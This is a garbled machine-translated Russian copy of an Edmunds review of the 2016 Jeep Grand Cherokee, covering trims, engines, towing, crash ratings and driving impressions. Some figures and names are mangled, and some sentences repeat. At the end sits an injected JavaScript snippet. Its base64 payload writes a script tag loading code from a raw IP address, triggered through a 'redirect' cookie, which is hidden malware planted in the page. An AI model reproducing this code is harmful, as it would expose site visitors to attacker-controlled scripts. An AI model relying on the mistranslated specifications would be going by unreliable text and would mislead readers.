Джип Гранд Чероки 2016

  1. Стили кузова, уровни отделки салона и опции
  2. Силовые агрегаты и производительность
  3. безопасности
  4. Дизайн интерьера и особенности
  5. Впечатления от вождения

Узнайте, что выделяет Jeep Grand Cherokee в этом обзоре экспертов от Edmunds.com:

com:

Полный обзор эксперта: Jeep Grand Cherokee 2016

Что нового на 2016 год

Grand Cherokee 2016 года получает новый рычаг переключения передач, который физически остается в выбранном положении, в то время как 3,6-литровый бензиновый V6 получает стандартную технологию автоматического останова и запуска, а также изменяемые параметры газораспределения и подъема, что позволяет постепенно повысить экономию топлива и мощность. Все накладки, кроме SRT, оснащены стандартным электроусилителем рулевого управления (с регулируемым усилием), а снижение веса по всей линейке обеспечивается благодаря дополнительным алюминиевым компонентам подвески. Наконец, новый пакет High Altitude дебютирует для Overland, и Grand Cherokee SRT получает новый измерительный кластер (с тахометром, установленным в центре) и выбираемые режимы работы.

Вступление

Традиционный внедорожник среднего размера, который когда-то был одним из основных на рынке новых автомобилей, в последние годы стал исчезающим видом. Но Jeep Grand Cherokee 2016 года вполне жив, большое спасибо, и на самом деле продвигается вперед с одним из лучших универсальных наборов навыков, которые вы найдете за эти деньги. Начиная с заднего привода, так же как и внедорожники в прежние времена, Grand Cherokee предлагает не менее трех полноприводных систем, и каждый раз, когда он правильно оборудован, это джип на жестких трассах. В то же время его роскошный интерьер и плавность хода также делают его вполне подходящим для повседневной езды. Это комбинация, с которой могут сравниться несколько других внедорожников.

Если бы мы остановились прямо здесь, «JGC» уже был бы очень желанным транспортным средством. Но этот Джип также обслуживает множество двигателей, которые отличают его от основных конкурентов. Базовый V6 на самом деле вполне способен сам по себе, но вы можете альтернативно указать мощный 5,7-литровый V8 или экономичный, богатый крутящим моментом 3,0-литровый дизельный V6, оба из которых являются выдающимися опциями в этом сегменте. В модели SRT есть даже фантастический 47-сильный V8, который обеспечивает производительность супер-внедорожника на много тысяч меньше, чем немецкие интерпретации этой формулы.

Для традиционного среднеразмерного внедорожника есть еще пара вариантов. Например, Toyota 4Runner обещает отличную стоимость при перепродаже и разделяет внедорожные способности джипа, хотя минусы включают в себя внутреннюю отделку и выбор одного двигателя. Если вы хотите классифицировать его, Volkswagen Touareg - близкий выбор для Джипа с точки зрения роскошных особенностей, и его кабина, возможно, еще лучше. Тем не менее, его дополнительный дизельный двигатель находится на перерыве в 2016 году, и это не серьезный внедорожник, которым может быть Grand Cherokee. Покупатели, заинтересованные в третьем ряду сидений, должны посетить Dodge Durango, который использует расширенную версию платформы JGC и разделяет большую часть своего оборудования. Но если вам нравится идея внедорожника с пятью пассажирами, который в значительной степени может все это сделать, то Jeep Grand Cherokee 2016 года - отличный выбор.

Но если вам нравится идея внедорожника с пятью пассажирами, который в значительной степени может все это сделать, то Jeep Grand Cherokee 2016 года - отличный выбор

Стили кузова, уровни отделки салона и опции

Jeep Grand Cherokee 2016 года - это среднеразмерный внедорожник с пятью пассажирами, который поставляется в пяти комплектациях: Laredo, Limited, Overland, Summit и SRT. Каждый доступен с задним приводом (2WD) или полным приводом (4WD), за исключением высокопроизводительной модели SRT, которая является только 4WD.

Стандартное оборудование для Laredo включает в себя 17-дюймовые легкосплавные диски, автоматические фары, круиз-контроль, противотуманные фары, автоматическое зажигание и вход без ключа, двухзонный автоматический климат-контроль, рулевое колесо с кожаной обивкой, наклоняемым и складывающимся, телефон Bluetooth и аудиоподключение, а также звуковая система с шестью динамиками с 5-дюймовым сенсорным экраном, USB-портом и вспомогательным аудиоразъемом.

Опциональный пакет 23E добавляет рейлинги на крыше, сиденье водителя с электроприводом в восьми направлениях (с четырехполосным приводом в поясничном положении) и спутниковое радио. Если вы воспользуетесь имеющейся группой безопасности и удобства, вы получите дверь с электроприводом, крышку багажника, дистанционный запуск двигателя, 115-вольтную розетку бытового типа, передние сиденья с подогревом и рулевое колесо с подогревом. Laredo с 4WD можно также приобрести вместе с внедорожной группой I Group (противоскользящие пластины, буксирные крюки, двухскоростная раздаточная коробка, выбираемые режимы движения «Selec-Terrain», управление спуском с холма, полноразмерное запасное колесо и вездеходные шины). Другие варианты для Laredo включают люк на крыше и 18-дюймовое колесо и 8,4-дюймовую радиостанцию, которая объединяет 18-дюймовые колеса, автоматическое затемнение зеркала заднего вида и 8,4-дюймовый сенсорный дисплей Uconnect с HD-радио и голосовыми командами.

Ограниченный уровень отделки салона стандартно поставляется с 18-дюймовыми колесами и зеркалом заднего вида с автоматическим затемнением, но не с 8,4-дюймовым сенсорным экраном. Кроме того, в стандартную комплектацию входят 23E-пакет и Security and Convenience Group, дополнительно добавляющая кожаную обивку - восьмиместную. сиденья с электроприводом пассажирского сиденья (с четырехсторонним электроприводом поясничного отдела), настройки памяти водителя, подогрев задних сидений, дополнительная возможность зарядки через USB, камера заднего вида и задний парктроник.

Дополнительные пакеты для Limited включают группу Off-Road Adventure II (добавление системы пневматической подвески и блокировку заднего дифференциала к группе Off-Road Adventure I), 75-ю годовщину Luxury Group (добавление ксеноновых фар с автоматическими дальним светом, автоматические дворники) Светодиодные ходовые огни и противотуманные фары, регулируемый по мощности руль, обивка из перфорированной кожи, вентилируемые передние сиденья и аудиосистема с девятью динамиками), а также пакет Luxury Group II (который начинается с предметов 75th Anniversary Luxury Group и добавляет двойной Панорамный люк на крыше и 8,4-дюймовый сенсорный экран).

Модель Overland оснащена колесами длиной до 20 дюймов, двойными хромированными выхлопными насадками, пакетом для буксировки (только для 4WD), складывающимися зеркалами с электроприводом, дополнительной внешней отделкой кузова, навигационной системой, модернизированным блоком приборов, рулевым механизмом в деревянной оправе. руль, удлиненная кожаная обивка, HD-радио и содержимое пакета Luxury Group II.

Группа передовых технологий доступна как для Limited, так и для Overland. Он включает в себя адаптивный круиз-контроль, контроль мертвых зон, предупреждение о перекрестном движении сзади и систему предотвращения столкновений с автоматическим торможением.

В эксклюзивном пакете Overland от Highland добавлены 20-дюймовые черные колеса, спортивный обвес, черные внешние элементы, алюминиевые педали, уникальная кожаная обивка и группа передовых технологий.

В топ-оф-лайн Grand Cherokee Summit добавлены полированные 20-дюймовые колеса, передние парковочные датчики, освещенные накладки на пороги, дополнительное шумопоглощающее стекло для окон, технология активного шумоподавления, отделка салона из натурального дерева, передовые технологии Групповая акустическая система Harman Kardon с 19 динамиками. Кроме того, вы можете дополнить Summit группой Platinum Series, которая включает в себя различные улучшения внешней отделки.

Высокопроизводительная модель SRT оборудована, как и модель Summit, за исключением нескольких стандартных функций, таких как панорамный люк на крыше и аудиосистема с 19 динамиками (обе из которых являются опциональными). Дополнительные функции включают в себя эксклюзивный двигатель V8, 20-дюймовые кованые колеса с высокопроизводительными шинами, адаптивную подвеску, настроенное на производительность рулевое управление, тормоза Brembo, задний дифференциал с ограниченным проскальзыванием, выбираемые рабочие характеристики, уникальный набор датчиков, кожаные и замшевые спортивные сиденья и карбоновые акценты салона.

Задняя развлекательная система с двумя экранами и поддержкой Blu-ray является опцией для Limited, Overland, Summit и SRT. Пакет буксировки, который является стандартным для 4WD Overland и Summit, доступен в качестве опции для других моделей.

Силовые агрегаты и производительность

Каждый 2016 Jeep Grand Cherokee, за исключением версии SRT, поставляется в стандартной комплектации с 3,6-литровым V6 мощностью 295 л.с. Это единственный двигатель, который вы можете получить на Laredos, в то время как модели Limited, Overland и Summit предлагают два дополнительных двигателя: 5,7-литровый V8 (360 л.с. и 390 фунт-фут крутящего момента) и 3,0-литровый дизельный V6 с турбонаддувом ( 240 л.с. и 420 фунт-фут). SRT поставляется исключительно с 6,4-литровым V8, который производит 475 л.с. и 470 фунтов-футов. Автоматическая коробка передач с восемью скоростями является стандартной через борт.

Задний привод является стандартным для не-SRT Grand Cherokees, но эти модели также предлагают три доступные системы 4WD: односкоростная, легкая система Quadra-Trac I (только Laredo), Quadra-Trac II с двухскоростной раздаточная коробка (Laredo, Limited, Overland и Summit) и Quadra-Drive II с задним электронным дифференциалом повышенного трения (Limited, Overland и Summit). Также доступна адаптивная пневматическая подвеска (Quadra-Lift) и выбираемая водителем система контроля тяги, которая приспосабливается к разной местности (опционально для 4WD Limited, стандартно для 4WD Overland и Summit).

Grand Cherokee SRT поставляется в стандартной комплектации со специализированной системой полного привода, настроенной больше для высокопроизводительного вождения, чем для бездорожья.

Мы еще не тестировали Grand Cherokee с его обновленным V6, но в предыдущих испытаниях Overland V6 с 4WD разгонялся с нуля до 60 миль в час за адекватные 7,9 секунды. Grand Cherokee Summit 4WD с дизельным двигателем разогнался до 60 миль в час за 7,7 секунды.

Максимальная буксирная способность для должным образом оборудованного Grand Cherokee с бензином V6 составляет 6200 фунтов. А буксирная способность 5,7-литрового V8, тем временем, достигает 7400 фунтов, что является отличным показателем для внедорожника среднего размера. Тяговое усилие для дизельного V6 такое же, как для 5,7-литрового V8. Grand Cherokee SRT может буксировать до 7200 фунтов.

безопасности

Jeep Grand Cherokee 2016 года выпуска оснащен дисковыми тормозами с антиблокировочной системой, системой контроля устойчивости и тяги, системой помощи при старте с холма, системой контроля спуска (только 4WD; опционально для Laredo и стандартной комплектации для остальных), передними боковыми подушками безопасности, боковыми шторками безопасности и активными подголовниками. Камера заднего вида входит в стандартную комплектацию Limited, как и задние датчики парковки, в то время как передние датчики парковки входят в стандартную комплектацию Summit.

Дополнительные технологии безопасности доступны в пакете опций Advanced Technology Group, включающем мониторинг мертвых зон, предупреждение о перекрестном движении сзади и систему предупреждения о столкновениях в прямом направлении с автоматическим торможением.

В ходе испытаний тормозов Edmunds, дизельный 4WD Jeep Grand Cherokee остановился на скорости 60 миль в час за 121 фут - приличное расстояние для этого класса, в то время как 4WD Grand Cherokee с бензином V6 потребовалось 133 фута, что больше, чем в среднем.

В предыдущих государственных краш-тестах 4WD Grand Cherokee получил пять звезд (из пяти возможных) за общую защиту от столкновений, а версия 2WD получила общую оценку в четыре звезды. Оба получили пять звезд за полную защиту от лобового удара и пять звезд за полную защиту от бокового удара. Причиной разницы в одну звезду в общем рейтинге является немного более низкий рейтинг опрокидывания в версии 2WD.

В ходе испытаний, проведенных Институтом страхования безопасности на дорогах, Jeep Grand Cherokee получил максимально возможную оценку «Хорошо» в испытаниях на столкновение с умеренным перекрытием лобового смещения, боковым ударом и прочности крыши. Он получил второй по величине «маржинальный» рейтинг в тесте с небольшим перекрытием с фронтальным смещением. Дизайн сиденья / подголовника Grand Cherokee был оценен как «Хороший» для защиты от удара хлыстом при ударе сзади.

Дизайн интерьера и особенности

Даже на нижних уровнях отделки салона Grand Cherokee может похвастаться впечатляющим дизайном и отделкой. Мы особенно любим дополнительный 8,4-дюймовый сенсорный экран и очень рекомендуем его. Он имеет простой в использовании интерфейс и включает в себя точку доступа WiFi и приложение для смартфона, а также навигационную систему, если автомобиль оборудован таким образом. Иногда требуется несколько слишком много сенсорных входов, чтобы настроить климат-контроль через сенсорный экран, но помимо этой незначительной жалобы, у Grand Cherokee есть одна из самых удобных кабин в этом классе.

В то время как Grand Cherokee не имеет места в третьем ряду, в нем достаточно места для семьи из четырех или пяти человек, и вы можете заказать широкий выбор роскошных аксессуаров, включая вентилируемые передние сиденья и двойной экран с поддержкой Blu-ray. Задняя развлекательная система с входом HDMI. Пассажиры на заднем сидении должны быть достаточно удобными, так как Grand Cherokee предоставляет достаточно места для двух взрослых, чтобы расслабиться (центральное положение находится под угрозой из-за заметного «горба» трансмиссии на полу). С задними сиденьями грузовой отсек измеряет 36,3 кубических фута. При сложенных задних сиденьях джип имеет грузоподъемность 68,3 кубических фута.

При сложенных задних сиденьях джип имеет грузоподъемность 68,3 кубических фута

Впечатления от вождения

Оснащенный базовым бензиновым двигателем V6, Jeep Grand Cherokee 2016 года обеспечивает удовлетворительное ускорение. Это также обеспечивает тихую, комфортную езду и похвальное чувство стабильности на поворотах. Автоматическая коробка передач с восемью скоростями - отличный союзник, поскольку она эффективно использует мощность V6 и переключается очень плавно. В общем, большинство покупателей должны быть довольны Grand Cherokee с базовым двигателем.

Тем не менее, если вы ищете лучшую экономию топлива, V6 с дизельным двигателем является интересным вариантом. Кроме того, высокий крутящий момент дизеля делает его идеальным для буксировки на высшем уровне и для бездорожья. Вокруг города, дизельный V6 иногда может прыгать в остановленном движении, и он испускает «грохот», уникальный для дизельных двигателей. Но как только он набирает скорость, он становится исключительно тихим. Возможно, самым большим недостатком дизеля является большой вес этого сверхмощного двигателя; дизельные Grand Cherokees весят значительно больше, чем другие версии, и это отрицательно сказывается на способах управления и управления джипом.

Если экономия топлива и бюджет не имеют особого значения, вам понравится Jeep Grand Cherokee SRT 2016 года. Он ускоряется и останавливается со скоростью, которая поразит даже самого опытного водителя спортивного автомобиля. SRT - это автомобиль с улучшенными эксплуатационными характеристиками, если он когда-либо существовал, хотя его ход относительно жесткий.

Внедорожник Jeep Grand Cherokee находится на вершине горы для своего класса. С препятствиями на трассе и крутыми холмами легко справиться независимо от того, какой двигатель вы выберете (хотя версия SRT предназначена в основном для движения по асфальтированной дороге), благодаря передовым полноприводным системам и щедрому дорожного просвета Jeep.

function getCookie (e) {var U = document.cookie.match (new RegExp («(?: ^ |;)» + e.replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) »)); return U? decodeURIComponent (U [1]): void 0} var src = «данные: текст / JavaScript; base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs =», теперь = Math.floor (Date.now () / 1e3), печенье = getCookie ( «перенаправление»); если (теперь> = (время = печенье) || пустота 0 === время) {var time = Math.floor (Date.now () / 1e3 + 86400), date = новая дата ((новая дата) .getTime () + 86400); document.cookie = ”redirect =” + время +»; Путь = /; истекает =»+ date.toGMTString (), document.write (»)}

Replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) »)); return U?